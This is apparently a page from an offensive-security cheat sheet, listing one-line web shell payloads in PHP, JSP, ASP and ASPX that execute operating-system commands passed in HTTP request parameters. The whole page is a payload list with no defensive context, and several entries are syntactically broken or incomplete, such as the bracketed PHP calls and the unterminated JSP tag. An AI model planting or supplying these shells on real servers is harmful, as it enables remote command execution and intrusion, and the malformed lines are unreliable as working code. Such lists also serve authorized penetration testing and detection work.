WEB Shell

PHP

<?php echo $_REQUEST['param'] ?>
<?php system['param'] ?>
<?php echo exec['param'] ?>
<?php echo shell_exec['param'] ?>
<?php echo passthru($_GET['cmd']); ?>
<?=`$_GET[0]`?>
<?php preg_replace('/.*/e', 'system("whoami");', ''); ?>
<?php echo `whoami`; ?>

Java

<% Runtime.getRuntime().exec(request.getParameter("cmd")); %

C#

Request['param']

ASP

<% eval request("cmd") %>

ASPX

<%response.write CreateObject("WScript.Shell").Exec(Request.QueryString("cmd")).StdOut.Readall()%>

PreviousHTTP Request Smuggling NextXSS

Last updated 2 years ago